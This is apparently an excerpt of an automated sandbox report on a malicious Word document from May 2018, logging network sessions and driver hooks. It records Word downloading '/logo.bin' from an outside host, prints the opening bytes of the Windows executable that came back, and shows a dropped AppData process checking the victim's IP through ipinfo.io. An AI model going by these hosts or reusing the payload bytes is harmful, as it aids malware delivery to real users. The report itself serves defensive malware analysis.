4	192.168.1.16	49192	87.247.241.143	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:05:03.047264099 MESZ	68	OUT	GET /logo.bin HTTP/1.1 Host: figs4u.co.uk Connection: Keep-Alive
Mai 25, 2018 16:05:03.129065990 MESZ	70	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:05:03 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:33:56 GMT Accept-Ranges: bytes Content-Length: 270387 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 00 7b de 79 61 15 8d 79 61 15 8d 79 61 15 8d fa 7d 1b 8d 78 61 15 8d 10 7e 1c 8d 7e 61 15 8d 90 7e 18 8d 78 61 15 8d 52 69 63 68 79 61 15 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 c2 07 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 b0 02 00 00 00 00 00 e4 16 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 04 00 00 10 00 00 51 4b 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 65 01 00 28 00 00 00 00 a0 01 00 f4 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 5c 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 80 29 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 9e 02 00 00 a0 01 00 00 a0 02 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 6c da 5b 4a 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$={yayaya}xa~~a~xaRichyaPEL$[`p@@QKe(8 .text\` `.data)pp@.rsrc@@l[JMSVBVM60.DLL
Mai 25, 2018 16:05:03.129085064 MESZ	71	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mai 25, 2018 16:05:03.129091024 MESZ	72	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mai 25, 2018 16:05:03.129548073 MESZ	73	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mai 25, 2018 16:05:03.131957054 MESZ	74	IN	Data Raw: a1 72 32 d1 a1 72 f1 9f a1 72 9d 49 a2 72 06 03 a3 72 08 a0 a1 72 06 04 a3 72 f7 e0 a0 72 21 76 a2 72 ee 94 a3 72 99 82 a3 72 2f 70 a2 72 ea 62 a3 72 7d 41 a1 72 74 9b a0 72 9f 19 a2 72 96 95 a2 72 f6 97 a4 72 fd a0 94 72 c7 8d a4 72 39 c3 a1 72 Data Ascii: r2rrIrrrrr!vrrr/prbr}Artrrrrrr9r(rrrrrr2vrGr}rrrX<rrrMrvrVrursrZrHr}ir]r!NrSr+r=rrVruBr:r7r:r:rJlrMrlrnrr5r
Mai 25, 2018 16:05:03.131983042 MESZ	76	IN	Data Raw: 80 10 40 00 ff 25 10 10 40 00 ff 25 50 10 40 00 ff 25 ac 11 40 00 ff 25 4c 10 40 00 ff 25 70 11 40 00 ff 25 f8 10 40 00 ff 25 a4 10 40 00 ff 25 9c 10 40 00 ff 25 f0 10 40 00 ff 25 68 10 40 00 ff 25 a4 11 40 00 ff 25 18 11 40 00 ff 25 74 11 40 00 Data Ascii: @%@%P@%@%L@%p@%@%@%@%@%h@%@%@%t@%<@%@@%t@%@%$@%@%<@%@%@%@%@%$@%@%@%@%l@h@0p@H!E"%Respo
Mai 25, 2018 16:05:03.132148981 MESZ	76	IN	Data Raw: 98 00 00 ff 98 00 00 f8 c0 00 00 08 00 08 00 20 00 08 00 38 00 08 00 88 18 08 00 20 20 08 00 28 20 08 00 a0 20 08 00 a8 20 08 00 30 28 08 00 70 38 08 00 30 48 08 00 78 50 08 00 e8 58 08 00 30 60 08 00 40 Data Ascii: 8 ( 0(p80HxPX0`@
Mai 25, 2018 16:05:03.141367912 MESZ	78	IN	Data Raw: 60 08 00 38 78 08 00 18 00 10 00 28 00 10 00 38 50 10 00 30 78 10 00 c8 80 10 00 38 88 10 00 40 88 10 00 d8 98 10 00 38 a0 10 00 ff c8 10 00 ff d8 10 00 20 20 18 00 38 68 18 00 30 80 18 00 30 98 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `8x(8P0x8@8 8h00L\R:\]Y:
Mai 25, 2018 16:05:03.141393900 MESZ	79	IN	Data Raw: 00 00 00 00 00 00 00 38 88 10 00 2d 9c 00 00 1c 83 03 00 23 21 00 00 11 19 00 00 28 5c 00 a1 32 74 0c ff 22 2a 0f fa 03 00 a7 ff 00 00 74 d0 00 00 58 13 00 00 65 00 00 00 78 02 00 00 8f 00 00 08 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 8-#!(\2t"*tXexb;2-e,c:%$+P(Xesu xn)#1
Mai 25, 2018 16:05:03.141499043 MESZ	80	IN	Data Raw: ba ff f7 61 b0 fc ff 6d ce ff fe 6b d0 f3 ff 18 19 63 ff e6 47 00 ff e9 50 00 fe e7 55 00 ff f1 6d 00 fc ee 7b 00 ff a6 3b 00 d4 db 7f 00 0f e5 95 00 00 ad 41 00 01 9e 44 00 00 80 38 00 00 00 00 00 00 00 00 00 00 08 18 a0 00 0c 30 d7 00 00 00 a6 Data Ascii: amkcGPUm{;AD80A"I?bi`PR[OT5$3@8 jNec(K_ZEXlVB0556
Mai 25, 2018 16:05:03.152396917 MESZ	81	IN	Data Raw: 00 00 00 00 00 00 00 00 00 36 ad ff 00 00 00 37 00 1a 26 b4 01 10 42 c4 00 20 25 ca 11 64 00 12 07 1a 00 00 00 49 00 00 01 c0 74 40 00 c8 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff Data Ascii: 67&B %dIt@@??(( ,c-s@';?

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.1.16	49193	87.247.241.143	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:06:14.215694904 MESZ	346	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:06:14.349939108 MESZ	347	IN	HTTP/1.1 302 Found Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Location: http://cypruscars4u.com/wordpress Content-Length: 217 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress">here</a>.</p></body></html>
Mai 25, 2018 16:06:14.350713968 MESZ	347	OUT	OPTIONS /wordpress HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:06:14.422110081 MESZ	348	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Location: http://cypruscars4u.com/wordpress/ Content-Length: 242 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress/">here</a>.</p></body></html>
Mai 25, 2018 16:06:14.422702074 MESZ	348	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:06:14.493726969 MESZ	348	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:06:14.495145082 MESZ	349	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:06:14.584757090 MESZ	349	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:06:14.586169004 MESZ	349	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:06:14.662197113 MESZ	350	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:06:14.663610935 MESZ	350	OUT	OPTIONS /wordpress/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: cypruscars4u.com
Mai 25, 2018 16:06:14.741904974 MESZ	351	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Mai 25, 2018 16:06:14.943006039 MESZ	351	IN	HTTP/1.1 403 Forbidden Date: Fri, 25 May 2018 14:06:14 GMT Server: Apache Content-Length: 338 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 77 6f 72 64 70 72 65 73 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wordpress/on this server.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.1.16	49194	216.239.34.21	80	C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:09:09.169472933 MESZ	352	OUT	GET /ip HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: ipinfo.io
Mai 25, 2018 16:09:10.098851919 MESZ	353	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:09:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 13 X-Powered-By: Express x-cloud-trace-context: 15209dba1ea908a76ed41cc5af6d65d2/9651110695430674204;o=0 Access-Control-Allow-Origin: * Set-Cookie: first_referrer=; Path=/ Via: 1.1 google Expires: Fri, 25 May 2018 14:09:09 GMT Cache-Control: private Data Raw: 36 34 2e 31 31 33 2e 33 32 2e 32 39 0a Data Ascii: 64.113.32.29
Mai 25, 2018 16:09:10.299015999 MESZ	353	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:09:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 13 X-Powered-By: Express x-cloud-trace-context: 15209dba1ea908a76ed41cc5af6d65d2/9651110695430674204;o=0 Access-Control-Allow-Origin: * Set-Cookie: first_referrer=; Path=/ Via: 1.1 google Expires: Fri, 25 May 2018 14:09:09 GMT Cache-Control: private Data Raw: 36 34 2e 31 31 33 2e 33 32 2e 32 39 0a Data Ascii: 64.113.32.29

Code Manipulations

IRP Handler

Handler Function	Driver	Address	Type
IRP_MJ_SET_VOLUME_INFORMATION	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_QUOTA	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_PNP	\FileSystem\MRxDAV	826FA00E	new
IRP_MJ_CREATE_MAILSLOT	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_POWER	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_DEVICE_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_READ	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_DIRECTORY_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_VOLUME_INFORMATION	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SET_SECURITY	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_WRITE	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_LOCK_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_CLEANUP	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_CLOSE	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_INTERNAL_DEVICE_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_CREATE	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_CREATE_NAMED_PIPE	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_DEVICE_CHANGE	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_SET_INFORMATION	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_QUERY_EA	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_FILE_SYSTEM_CONTROL	\FileSystem\MRxDAV	81F451DE	new
IRP_MJ_FLUSH_BUFFERS	\FileSystem\MRxDAV	81F451DE	new
